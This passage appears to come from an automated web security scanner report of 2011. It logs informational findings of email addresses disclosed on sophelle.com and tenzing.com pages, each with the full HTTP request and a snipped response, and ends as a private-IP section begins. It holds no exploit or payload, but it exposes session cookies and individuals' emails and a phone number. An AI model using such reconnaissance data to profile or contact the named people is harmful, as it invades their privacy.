Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A17; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.14.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9777
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:47 GMT
Accept-Ranges: bytes
ETag: "ceddd455144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Functional Testing
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.107. http://www.sophelle.com/products/cq/performance-testing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/performance-testing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/performance-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/free-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.9.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 10282
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:21 GMT
Accept-Ranges: bytes
ETag: "8af498e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Performance Testing
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.108. http://www.sophelle.com/products/cq/pricing-options.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/pricing-options.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/pricing-options.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/thank-you-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.7.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 15491
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:22 GMT
Accept-Ranges: bytes
ETag: "282fcc8e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>QA Service Prices a
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.109. http://www.sophelle.com/products/cq/thank-you-trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/thank-you-trial.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/thank-you-trial.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/free-trial.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.6.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 6463
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:29 GMT
Accept-Ranges: bytes
ETag: "9a318892144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Contact Us | Contin
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.110. http://www.sophelle.com/products/cq/user-interface-testing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/user-interface-testing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/user-interface-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/thank-you-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.12.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9510
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:31 GMT
Accept-Ranges: bytes
ETag: "3446c593144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>User Interface Test
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.111. http://www.tenzing.com/atg-ecommerce-hosting.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /atg-ecommerce-hosting.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 27188
Content-Type: text/html
Set-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/
Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.112. http://www.tenzing.com/cloud/cloud-pricing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /cloud/cloud-pricing.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /cloud/cloud-pricing.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/sitemap.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=4; __unam=d5ad7d-1324070db49-4656e66c-3; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.3.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 37219
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.113. http://www.tenzing.com/cloud/sign-up-now.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /cloud/sign-up-now.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /cloud/sign-up-now.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/cloud/cloud-pricing.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=0; __unam=d5ad7d-1324070db49-4656e66c-4; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.4.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 34304
Content-Type: text/html
Set-Cookie: casestudiesID=1; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.114. http://www.tenzing.com/css/basic_stylesheet_v1.1.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /css/basic_stylesheet_v1.1.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/basic_stylesheet_v1.1.css HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 46937
Content-Type: text/css
Last-Modified: Wed, 31 Aug 2011 14:14:36 GMT
Accept-Ranges: bytes
ETag: "a3832850e867cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT

/*
Basic Style Sheet for Secondary Pages
version: 1.1
developers: Scott Beardmore (Tenzing.com) / Ulf Lonegren (Saelstrom.com)
email: scott.beardmore@tenzing.com
website: http://www.tenzing.com
/* ------------------------------------------------------------------------------------------------ Base Structure ---------------------------------- */

/* ------
...[SNIP]...

22.115. http://www.tenzing.com/css/navigation_stylesheet_v1.1.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /css/navigation_stylesheet_v1.1.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/navigation_stylesheet_v1.1.css HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 14891
Content-Type: text/css
Last-Modified: Wed, 31 Aug 2011 14:14:36 GMT
Accept-Ranges: bytes
ETag: "a3832850e867cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT

/*
Navigation Style Sheet for Secondary Pages
version: 1.1
developers: Scott Beardmore (Tenzing.com) / Ulf Lonegren (Saelstrom.com)
email: scott.beardmore@tenzing.com
website: http://www.tenzing.com
/* ----------------------------------------------------------------- LINK STYLES ---------------------------------- */

/* ------ Hyperlinks ------ */
a.bodylinks
...[SNIP]...

22.116. http://www.tenzing.com/hosting-solutions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /hosting-solutions.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /hosting-solutions.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; __unam=d5ad7d-1324070db49-4656e66c-1; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.1.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 19991
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.117. http://www.tenzing.com/js/jquery/jquery.accordion.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /js/jquery/jquery.accordion.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery/jquery.accordion.js HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1882
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Sep 2010 13:29:43 GMT
Accept-Ranges: bytes
ETag: "86ed1f102350cb1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:07 GMT

/***********************************************************************************************************************
DOCUMENT: includes/javascript.js
DEVELOPED BY: Ryan Stemkoski
COMPANY: Zipline Interactive
EMAIL: ryan@gozipline.com
PHONE: 509-321-2849
DATE: 3/26/2009
UPDATED: 3/25/2010
DESCRIPTION: This is the JavaScript required to create the accordion style menu. Requires jQuery library
NOTE: Because of a bug in jQuery with I
...[SNIP]...

22.118. http://www.tenzing.com/sitemap.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /sitemap.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /sitemap.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/hosting-solutions.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=3; __unam=d5ad7d-1324070db49-4656e66c-2; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.2.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 21684
Content-Type: text/html
Set-Cookie: casestudiesID=4; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.119. http://www.tenzing.com/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /validation.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /validation.js HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 17602
Content-Type: application/x-javascript
Last-Modified: Wed, 01 Jun 2011 10:49:25 GMT
Accept-Ranges: bytes
ETag: "fea889924920cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:09 GMT

/*

Generic Form Validation.
tboland@gmail.com
http://www.techtoolblog.com
License: Free To Use, If Modified/Added
please send updated source to tboland@gmail.com

To Validate a Form Element Add the Custom Attribute:
validate="VALIDATEHOW"

Your Current Options Are:
"not_empty"
"integer"
"number" - decimal allowed
"email"
"phone" - includes internati
...[SNIP]...
}
}
}
   
   return blnResult;
}

/*
This script and many more are available free online at
The JavaScript Source!! http://javascript.internet.com

V1.1.3: Sandeep V. Tamhankar (stamhankar@hotmail.com)
Original: Sandeep V. Tamhankar (stamhankar@hotmail.com)
Changes:
1.1.4: Fixed a bug where upper ASCII characters (i.e. accented letters
international characters) were allowed.

1.1.3: Added the restriction to only accept addresses ending in two
lett
...[SNIP]...
s was passing
(the bug is actually in the weak regexp engine of the browser; I
simplified the regexps to make it work).

1.1.1: Removed restriction that countries must be preceded by a domain,
so abc@host.uk is now legal. However, there's still the
restriction that an address must end in a two or three letter
word.

1.1: Rewrote most of the function to conform more closely to RFC 822.

1.0: Origin
...[SNIP]...
wing string represents an atom (basically a series of non-special characters.) */

var atom=validChars + '+';

/* The following string represents one word in the typical username.
For example, in john.doe@somewhere.com, john and doe are words.
Basically, a word is either an atom or quoted string. */

var word="(" + atom + "|" + quotedUser + ")";

// The following pattern describes the structure of the user

v
...[SNIP]...

23. Private IP addresses disclosed
There are 30 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

